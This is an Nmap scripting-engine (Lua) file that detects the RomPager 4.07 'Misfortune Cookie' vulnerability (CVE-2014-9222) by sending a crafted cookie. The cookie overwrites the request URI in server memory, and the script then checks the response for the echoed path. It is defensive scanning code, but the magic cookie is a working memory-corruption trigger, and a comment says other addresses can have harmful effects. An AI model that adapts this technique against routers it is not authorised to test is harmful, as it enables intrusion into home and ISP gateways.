1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
|
description = [[Detects the RomPager 4.07 Misfortune Cookie vulnerability by safely exploiting it.]]
author = "Andrew Orr"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"vuln", "intrusive"}
---
-- @see http-vuln-cve2013-6786.nse
--
-- @usage
-- nmap <target> -p 7547 --script=http-vuln-misfortune-cookie
--
-- @output
-- PORT STATE SERVICE REASON
-- 7547/tcp open unknown syn-ack
-- | http-vuln-misfortune-cookie:
-- | VULNERABLE:
-- | RomPager 4.07 Misfortune Cookie
-- | State: VULNERABLE
-- | IDs: BID:71744 CVE:CVE-2014-9222
-- | Description:
-- | The cookie handling routines in RomPager 4.07 are vulnerable to remote code
-- | execution. This script has verified the vulnerability by exploiting the web
-- | server in a safe manner.
-- | References:
-- | http://www.kb.cert.org/vuls/id/561444
-- | http://mis.fortunecook.ie/too-many-cooks-exploiting-tr069_tal-oppenheim_31c3.pdf
-- | http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9222
-- | http://www.checkpoint.com/blog/fortune-cookie-hole-internet-gateway/index.html
-- |_ http://www.securityfocus.com/bid/71744
local http = require "http"
local shortport = require "shortport"
local vulns = require "vulns"
portrule = shortport.port_or_service(7547, "http")
-- This memory address overwrites the request URI.
-- Other addresses may have other effects, some harmful.
local MAGIC_COOKIE = "C107373883"
local function vuln_to_misfortune_cookie(host, port)
local request_path = "/nmap_test"
local options = { cookies = MAGIC_COOKIE .. "=" .. request_path }
local flag = request_path .. "' was not found on the RomPager server."
local req = http.get(host, port, "/", options)
if not(http.response_contains(req, flag)) then
return false
end
return true
end
action = function(host, port)
local vuln = {
title = "RomPager 4.07 Misfortune Cookie",
state = vulns.STATE.NOT_VULN,
IDS = { CVE = 'CVE-2014-9222', BID = '71744' },
description = [[
The cookie handling routines in RomPager 4.07 are vulnerable to remote code
execution. This script has verified the vulnerability by exploiting the web
server in a safe manner.]],
references = {
"http://www.checkpoint.com/blog/fortune-cookie-hole-internet-gateway/index.html",
"http://mis.fortunecook.ie/too-many-cooks-exploiting-tr069_tal-oppenheim_31c3.pdf",
"http://www.kb.cert.org/vuls/id/561444"
}
}
local report = vulns.Report:new(SCRIPT_NAME, host, port)
if vuln_to_misfortune_cookie(host, port) then
vuln.state = vulns.STATE.VULN
else
vuln.state = vulns.STATE.NOT_VULN
end
return report:make_output(vuln)
end
|
